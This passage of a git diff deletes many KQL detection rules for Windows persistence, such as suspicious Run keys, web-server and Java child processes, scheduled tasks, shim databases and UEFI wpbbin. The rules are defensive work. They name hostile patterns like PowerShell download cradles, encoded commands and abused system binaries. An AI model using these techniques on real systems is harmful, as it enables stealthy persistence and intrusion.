-| where (RegistryValueData contains "powershell" or RegistryValueData contains "pwsh " or RegistryValueData contains "FromBase64String" or RegistryValueData contains ".DownloadFile(" or RegistryValueData contains ".DownloadString(" or RegistryValueData contains " -w hidden " or RegistryValueData contains " -w 1 " or RegistryValueData contains "-windowstyle hidden" or RegistryValueData contains "-window hidden" or RegistryValueData contains " -nop " or RegistryValueData contains " -encodedcommand " or RegistryValueData contains "-ExecutionPolicy Bypass" or RegistryValueData contains "Invoke-Expression" or RegistryValueData contains "IEX (" or RegistryValueData contains "Invoke-Command" or RegistryValueData contains "ICM -" or RegistryValueData contains "Invoke-WebRequest" or RegistryValueData contains "IWR " or RegistryValueData contains " -noni " or RegistryValueData contains " -noninteractive ") and RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
\ No newline at end of file
diff --git a/Persistence/Suspicious_Process_By_Web_Server_Process.kql b/Persistence/Suspicious_Process_By_Web_Server_Process.kql
deleted file mode 100644
index 3fef9b24..00000000
--- a/Persistence/Suspicious_Process_By_Web_Server_Process.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/01/16
-// Level: high
-// Description: Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation
-
-// Tags: attack.persistence, attack.t1505.003, attack.t1190
-DeviceProcessEvents
-| where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((InitiatingProcessCommandLine contains "CATALINA_HOME" or InitiatingProcessCommandLine contains "catalina.home" or InitiatingProcessCommandLine contains "catalina.jar") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\php.exe" or InitiatingProcessFolderPath endswith "\\tomcat.exe" or InitiatingProcessFolderPath endswith "\\UMWorkerProcess.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\ws_TomcatService.exe")) and (FolderPath endswith "\\arp.exe" or FolderPath endswith "\\at.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\dsget.exe" or FolderPath endswith "\\hostname.exe" or FolderPath endswith "\\nbtstat.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netdom.exe" or FolderPath endswith "\\netsh.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ntdutil.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\qprocess.exe" or FolderPath endswith "\\query.exe" or FolderPath endswith "\\qwinsta.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\sc.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wusa.exe") and (not(((ProcessCommandLine endswith "Windows\\system32\\cmd.exe /c C:\\ManageEngine\\ADManager \"Plus\\ES\\bin\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt" and InitiatingProcessFolderPath endswith "\\java.exe") or ((ProcessCommandLine contains "sc query" and ProcessCommandLine contains "ADManager Plus") and InitiatingProcessFolderPath endswith "\\java.exe"))))
\ No newline at end of file
diff --git a/Persistence/Suspicious_Process_Execution_From_Fake_Recycle.Bin_Folder.kql b/Persistence/Suspicious_Process_Execution_From_Fake_Recycle.Bin_Folder.kql
deleted file mode 100644
index 317441d1..00000000
--- a/Persistence/Suspicious_Process_Execution_From_Fake_Recycle.Bin_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/07/12
-// Level: high
-// Description: Detects process execution from a fake recycle bin folder, often used to avoid security solution.
-// Tags: attack.persistence, attack.defense_evasion
-DeviceProcessEvents
-| where FolderPath contains "RECYCLERS.BIN\\" or FolderPath contains "RECYCLER.BIN\\"
\ No newline at end of file
diff --git a/Persistence/Suspicious_Processes_Spawned_by_Java.EXE.kql b/Persistence/Suspicious_Processes_Spawned_by_Java.EXE.kql
deleted file mode 100644
index 7ac4d66c..00000000
--- a/Persistence/Suspicious_Processes_Spawned_by_Java.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades), Florian Roth
-// Date: 2021/12/17
-// Level: high
-// Description: Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j)
-// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\query.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\java.exe"
\ No newline at end of file
diff --git a/Persistence/Suspicious_Processes_Spawned_by_WinRM.kql b/Persistence/Suspicious_Processes_Spawned_by_WinRM.kql
deleted file mode 100644
index 156ae6e7..00000000
--- a/Persistence/Suspicious_Processes_Spawned_by_WinRM.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades), Markus Neis
-// Date: 2021/05/20
-// Level: high
-// Description: Detects suspicious processes including shells spawnd from WinRM host process
-// Tags: attack.t1190, attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe") and InitiatingProcessFolderPath endswith "\\wsmprovhost.exe"
\ No newline at end of file
diff --git a/Persistence/Suspicious_Run_Key_from_Download.kql b/Persistence/Suspicious_Run_Key_from_Download.kql
deleted file mode 100644
index a2012d01..00000000
--- a/Persistence/Suspicious_Run_Key_from_Download.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/10/01
-// Level: high
-// Description: Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where (InitiatingProcessFolderPath contains "\\Downloads\\" or InitiatingProcessFolderPath contains "\\Temporary Internet Files\\Content.Outlook\\" or InitiatingProcessFolderPath contains "\\Local Settings\\Temporary Internet Files\\") and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
\ No newline at end of file
diff --git a/Persistence/Suspicious_Scheduled_Task_Creation_Involving_Temp_Folder.kql b/Persistence/Suspicious_Scheduled_Task_Creation_Involving_Temp_Folder.kql
deleted file mode 100644
index 00359f36..00000000
--- a/Persistence/Suspicious_Scheduled_Task_Creation_Involving_Temp_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/03/11
-// Level: high
-// Description: Detects the creation of scheduled tasks that involves a temporary folder and runs only once
-// Tags: attack.execution, attack.persistence, attack.t1053.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /create " and ProcessCommandLine contains " /sc once " and ProcessCommandLine contains "\\Temp\\") and FolderPath endswith "\\schtasks.exe"
\ No newline at end of file
diff --git a/Persistence/Suspicious_Scheduled_Task_Creation_via_Masqueraded_XML_File.kql b/Persistence/Suspicious_Scheduled_Task_Creation_via_Masqueraded_XML_File.kql
deleted file mode 100644
index 55ba5abb..00000000
--- a/Persistence/Suspicious_Scheduled_Task_Creation_via_Masqueraded_XML_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel, Elastic (idea)
-// Date: 2023/04/20
-// Level: medium
-// Description: Detects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence
-// Tags: attack.defense_evasion, attack.persistence, attack.t1036.005, attack.t1053.005
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "/create" or ProcessCommandLine contains "-create") and (ProcessCommandLine contains "/xml" or ProcessCommandLine contains "-xml") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")) and (not((ProcessCommandLine contains ".xml" or ((InitiatingProcessCommandLine contains ":\\WINDOWS\\Installer\\MSI" and InitiatingProcessCommandLine contains ".tmp,zzzzInvokeManagedCustomActionOutOfProc") and InitiatingProcessFolderPath endswith "\\rundll32.exe") or ProcessIntegrityLevel =~ "System"))) and (not(((InitiatingProcessFolderPath contains ":\\ProgramData\\OEM\\UpgradeTool\\CareCenter_" and InitiatingProcessFolderPath contains "\\BUnzip\\Setup_msi.exe") or InitiatingProcessFolderPath endswith ":\\Program Files\\Axis Communications\\AXIS Camera Station\\SetupActions.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Axis Communications\\AXIS Device Manager\\AdmSetupActions.exe" or InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Zemana\\AntiMalware\\AntiMalware.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Dell\\SupportAssist\\pcdrcui.exe")))
\ No newline at end of file
diff --git a/Persistence/Suspicious_Scheduled_Task_Write_to_System32_Tasks.kql b/Persistence/Suspicious_Scheduled_Task_Write_to_System32_Tasks.kql
deleted file mode 100644
index 6ba5044f..00000000
--- a/Persistence/Suspicious_Scheduled_Task_Write_to_System32_Tasks.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/11/16
-// Level: high
-// Description: Detects the creation of tasks from processes executed from suspicious locations
-// Tags: attack.persistence, attack.execution, attack.t1053
-DeviceFileEvents
-| where (InitiatingProcessFolderPath contains "\\AppData\\" or InitiatingProcessFolderPath contains "C:\\PerfLogs" or InitiatingProcessFolderPath contains "\\Windows\\System32\\config\\systemprofile") and FolderPath contains "\\Windows\\System32\\Tasks"
\ No newline at end of file
diff --git a/Persistence/Suspicious_Schtasks_Execution_AppData_Folder.kql b/Persistence/Suspicious_Schtasks_Execution_AppData_Folder.kql
deleted file mode 100644
index fe01afd0..00000000
--- a/Persistence/Suspicious_Schtasks_Execution_AppData_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/03/15
-// Level: high
-// Description: Detects the creation of a schtask that executes a file from C:\Users\<USER>\AppData\Local
-// Tags: attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM ") and (ProcessCommandLine contains "/Create" and ProcessCommandLine contains "/RU" and ProcessCommandLine contains "/TR" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\") and FolderPath endswith "\\schtasks.exe") and (not((ProcessCommandLine contains "/TN TVInstallRestore" and FolderPath endswith "\\schtasks.exe" and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath contains "TeamViewer_.exe"))))
\ No newline at end of file
diff --git a/Persistence/Suspicious_Screensaver_Binary_File_Creation.kql b/Persistence/Suspicious_Screensaver_Binary_File_Creation.kql
deleted file mode 100644
index 973b874b..00000000
--- a/Persistence/Suspicious_Screensaver_Binary_File_Creation.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2021/12/29
-// Level: medium
-// Description: Adversaries may establish persistence by executing malicious content triggered by user inactivity.
-Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension
-
-// Tags: attack.persistence, attack.t1546.002
-DeviceFileEvents
-| where FolderPath endswith ".scr" and (not(((InitiatingProcessFolderPath endswith "\\Kindle.exe" or InitiatingProcessFolderPath endswith "\\Bin\\ccSvcHst.exe") or (InitiatingProcessFolderPath endswith "\\TiWorker.exe" and FolderPath endswith "\\uwfservicingscr.scr"))))
\ No newline at end of file
diff --git a/Persistence/Suspicious_Service_DACL_Modification_Via_Set-Service_Cmdlet.kql b/Persistence/Suspicious_Service_DACL_Modification_Via_Set-Service_Cmdlet.kql
deleted file mode 100644
index ccf4a3ab..00000000
--- a/Persistence/Suspicious_Service_DACL_Modification_Via_Set-Service_Cmdlet.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/18
-// Level: high
-// Description: Detects suspicious DACL modifications via the "Set-Service" cmdlet using the "SecurityDescriptorSddl" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable
-// Tags: attack.persistence, attack.t1543.003
-DeviceProcessEvents
-| where (FolderPath endswith "\\pwsh.exe" or ProcessVersionInfoOriginalFileName =~ "pwsh.dll") and (ProcessCommandLine contains "-SecurityDescriptorSddl " or ProcessCommandLine contains "-sd ") and ((ProcessCommandLine contains ";;;IU" or ProcessCommandLine contains ";;;SU" or ProcessCommandLine contains ";;;BA" or ProcessCommandLine contains ";;;SY" or ProcessCommandLine contains ";;;WD") and (ProcessCommandLine contains "Set-Service " and ProcessCommandLine contains "D;;"))
\ No newline at end of file
diff --git a/Persistence/Suspicious_Service_Path_Modification.kql b/Persistence/Suspicious_Service_Path_Modification.kql
deleted file mode 100644
index f0c3811c..00000000
--- a/Persistence/Suspicious_Service_Path_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/10/21
-// Level: high
-// Description: Detects service path modification via the "sc" binary to a suspicious command or path
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "cmd " or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "svchost" or ProcessCommandLine contains "dllhost" or ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cmd /r" or ProcessCommandLine contains "C:\\Users\\Public" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or ProcessCommandLine contains "C:\\Windows\\TEMP\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp") and (ProcessCommandLine contains "config" and ProcessCommandLine contains "binPath") and FolderPath endswith "\\sc.exe"
\ No newline at end of file
diff --git a/Persistence/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql b/Persistence/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql
deleted file mode 100644
index a6b5d758..00000000
--- a/Persistence/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades)
-// Date: 2021/12/22
-// Level: high
-// Description: Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)
-// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") and InitiatingProcessFolderPath endswith "\\keytool.exe"
\ No newline at end of file
diff --git a/Persistence/Suspicious_Shim_Database_Patching_Activity.kql b/Persistence/Suspicious_Shim_Database_Patching_Activity.kql
deleted file mode 100644
index 1df15c46..00000000
--- a/Persistence/Suspicious_Shim_Database_Patching_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/01
-// Level: high
-// Description: Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence.
-// Tags: attack.persistence, attack.t1546.011
-DeviceRegistryEvents
-| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom" and (RegistryKey endswith "\\csrss.exe" or RegistryKey endswith "\\dllhost.exe" or RegistryKey endswith "\\explorer.exe" or RegistryKey endswith "\\RuntimeBroker.exe" or RegistryKey endswith "\\services.exe" or RegistryKey endswith "\\sihost.exe" or RegistryKey endswith "\\svchost.exe" or RegistryKey endswith "\\taskhostw.exe" or RegistryKey endswith "\\winlogon.exe" or RegistryKey endswith "\\WmiPrvSe.exe")
\ No newline at end of file
diff --git a/Persistence/Suspicious_Startup_Folder_Persistence.kql b/Persistence/Suspicious_Startup_Folder_Persistence.kql
deleted file mode 100644
index b30c57ba..00000000
--- a/Persistence/Suspicious_Startup_Folder_Persistence.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/10
-// Level: high
-// Description: Detects when a file with a suspicious extension is created in the startup folder
-// Tags: attack.persistence, attack.t1547.001
-DeviceFileEvents
-| where FolderPath contains "\\Windows\\Start Menu\\Programs\\Startup\\" and (FolderPath endswith ".vbs" or FolderPath endswith ".vbe" or FolderPath endswith ".bat" or FolderPath endswith ".ps1" or FolderPath endswith ".hta" or FolderPath endswith ".dll" or FolderPath endswith ".jar" or FolderPath endswith ".msi" or FolderPath endswith ".scr" or FolderPath endswith ".cmd")
\ No newline at end of file
diff --git a/Persistence/Suspicious_WindowsTerminal_Child_Processes.kql b/Persistence/Suspicious_WindowsTerminal_Child_Processes.kql
deleted file mode 100644
index 04afff03..00000000
--- a/Persistence/Suspicious_WindowsTerminal_Child_Processes.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/25
-// Level: medium
-// Description: Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)
-// Tags: attack.execution, attack.persistence
-DeviceProcessEvents
-| where ((InitiatingProcessFolderPath endswith "\\WindowsTerminal.exe" or InitiatingProcessFolderPath endswith "\\wt.exe") and ((FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\csc.exe") or (FolderPath contains "C:\\Users\\Public\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Desktop\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Windows\\TEMP\\") or (ProcessCommandLine contains " iex " or ProcessCommandLine contains " icm" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "Import-Module " or ProcessCommandLine contains "ipmo " or ProcessCommandLine contains "DownloadString(" or ProcessCommandLine contains " /c " or ProcessCommandLine contains " /k " or ProcessCommandLine contains " /r "))) and (not(((ProcessCommandLine contains "Import-Module" and ProcessCommandLine contains "Microsoft.VisualStudio.DevShell.dll" and ProcessCommandLine contains "Enter-VsDevShell") or (ProcessCommandLine contains "\\AppData\\Local\\Packages\\Microsoft.WindowsTerminal_" and ProcessCommandLine contains "\\LocalState\\settings.json") or (ProcessCommandLine contains "C:\\Program Files\\Microsoft Visual Studio\\" and ProcessCommandLine contains "\\Common7\\Tools\\VsDevCmd.bat"))))
\ No newline at end of file
diff --git a/Persistence/Suspicious_desktop.ini_Action.kql b/Persistence/Suspicious_desktop.ini_Action.kql
deleted file mode 100644
index 7c92db8d..00000000
--- a/Persistence/Suspicious_desktop.ini_Action.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)
-// Date: 2020/03/19
-// Level: medium
-// Description: Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.
-// Tags: attack.persistence, attack.t1547.009
-DeviceFileEvents
-| where FolderPath endswith "\\desktop.ini" and (not(((InitiatingProcessFolderPath startswith "C:\\Windows\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\JetBrains\\Toolbox\\bin\\7z.exe" and FolderPath contains "\\JetBrains\\apps\\") or FolderPath startswith "C:\\$WINDOWS.~BT\\NewOS\\")))
\ No newline at end of file
diff --git a/Persistence/Sysinternals_PsService_Execution.kql b/Persistence/Sysinternals_PsService_Execution.kql
deleted file mode 100644
index f02b57a4..00000000
--- a/Persistence/Sysinternals_PsService_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/16
-// Level: medium
-// Description: Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering
-// Tags: attack.discovery, attack.persistence, attack.t1543.003
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "psservice.exe" or (FolderPath endswith "\\PsService.exe" or FolderPath endswith "\\PsService64.exe")
\ No newline at end of file
diff --git a/Persistence/Sysinternals_PsSuspend_Execution.kql b/Persistence/Sysinternals_PsSuspend_Execution.kql
deleted file mode 100644
index fe4d7335..00000000
--- a/Persistence/Sysinternals_PsSuspend_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/23
-// Level: medium
-// Description: Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes
-// Tags: attack.discovery, attack.persistence, attack.t1543.003
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "pssuspend.exe" or (FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe")
\ No newline at end of file
diff --git a/Persistence/System_Scripts_Autorun_Keys_Modification.kql b/Persistence/System_Scripts_Autorun_Keys_Modification.kql
deleted file mode 100644
index a6f88a0b..00000000
--- a/Persistence/System_Scripts_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where RegistryKey contains "\\Software\\Policies\\Microsoft\\Windows\\System\\Scripts" and (RegistryKey contains "\\Startup" or RegistryKey contains "\\Shutdown" or RegistryKey contains "\\Logon" or RegistryKey contains "\\Logoff") and (not(RegistryValueData =~ "(Empty)"))
\ No newline at end of file
diff --git a/Persistence/Tasks_Folder_Evasion.kql b/Persistence/Tasks_Folder_Evasion.kql
deleted file mode 100644
index 057c6541..00000000
--- a/Persistence/Tasks_Folder_Evasion.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Sreeman
-// Date: 2020/01/13
-// Level: high
-// Description: The Tasks folder in system32 and syswow64 are globally writable paths.
-Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application
-in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr
-
-// Tags: attack.defense_evasion, attack.persistence, attack.execution, attack.t1574.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "echo " or ProcessCommandLine contains "copy " or ProcessCommandLine contains "type " or ProcessCommandLine contains "file createnew") and (ProcessCommandLine contains " C:\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains " C:\\Windows\\SysWow64\\Tasks\\")
\ No newline at end of file
diff --git a/Persistence/Third_Party_Software_DLL_Sideloading.kql b/Persistence/Third_Party_Software_DLL_Sideloading.kql
deleted file mode 100644
index 15cbb1e6..00000000
--- a/Persistence/Third_Party_Software_DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/08/17
-// Level: medium
-// Description: Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\commfunc.dll" and (not((FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\" or (FolderPath startswith "C:\\Program Files\\Lenovo\\Communications Utility\\" or FolderPath startswith "C:\\Program Files (x86)\\Lenovo\\Communications Utility\\"))))) or (FolderPath endswith "\\tosbtkbd.dll" and (not((FolderPath startswith "C:\\Program Files\\Toshiba\\Bluetooth Toshiba Stack\\" or FolderPath startswith "C:\\Program Files (x86)\\Toshiba\\Bluetooth Toshiba Stack\\"))))
\ No newline at end of file
diff --git a/Persistence/UAC_Bypass_With_Fake_DLL.kql b/Persistence/UAC_Bypass_With_Fake_DLL.kql
deleted file mode 100644
index ea6ebd96..00000000
--- a/Persistence/UAC_Bypass_With_Fake_DLL.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: oscd.community, Dmitry Uchakin
-// Date: 2020/10/06
-// Level: high
-// Description: Attempts to load dismcore.dll after dropping it
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\dismcore.dll" and InitiatingProcessFolderPath endswith "\\dism.exe") and (not(FolderPath =~ "C:\\Windows\\System32\\Dism\\dismcore.dll"))
\ No newline at end of file
diff --git a/Persistence/UEFI_Persistence_Via_Wpbbin_-_FileCreation.kql b/Persistence/UEFI_Persistence_Via_Wpbbin_-_FileCreation.kql
deleted file mode 100644
index b24cd1fc..00000000
--- a/Persistence/UEFI_Persistence_Via_Wpbbin_-_FileCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/18
-// Level: high
-// Description: Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory. Which could be indicative of UEFI based persistence method
-// Tags: attack.persistence, attack.defense_evasion, attack.t1542.001
-DeviceFileEvents
-| where FolderPath =~ "C:\\Windows\\System32\\wpbbin.exe"
\ No newline at end of file
diff --git a/Persistence/UEFI_Persistence_Via_Wpbbin_-_ProcessCreation.kql b/Persistence/UEFI_Persistence_Via_Wpbbin_-_ProcessCreation.kql
deleted file mode 100644
index dba934a8..00000000
--- a/Persistence/UEFI_Persistence_Via_Wpbbin_-_ProcessCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/18
-// Level: high
-// Description: Detects execution of the binary "wpbbin" which is used as part of the UEFI based persistence method described in the reference section
-// Tags: attack.persistence, attack.defense_evasion, attack.t1542.001
-DeviceProcessEvents
-| where FolderPath =~ "C:\\Windows\\System32\\wpbbin.exe"
\ No newline at end of file
diff --git a/Persistence/Uncommon_Extension_Shim_Database_Installation_Via_Sdbinst.EXE.kql b/Persistence/Uncommon_Extension_Shim_Database_Installation_Via_Sdbinst.EXE.kql
deleted file mode 100644
index 6f462ae1..00000000
--- a/Persistence/Uncommon_Extension_Shim_Database_Installation_Via_Sdbinst.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/01
-// Level: medium
-// Description: Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe.
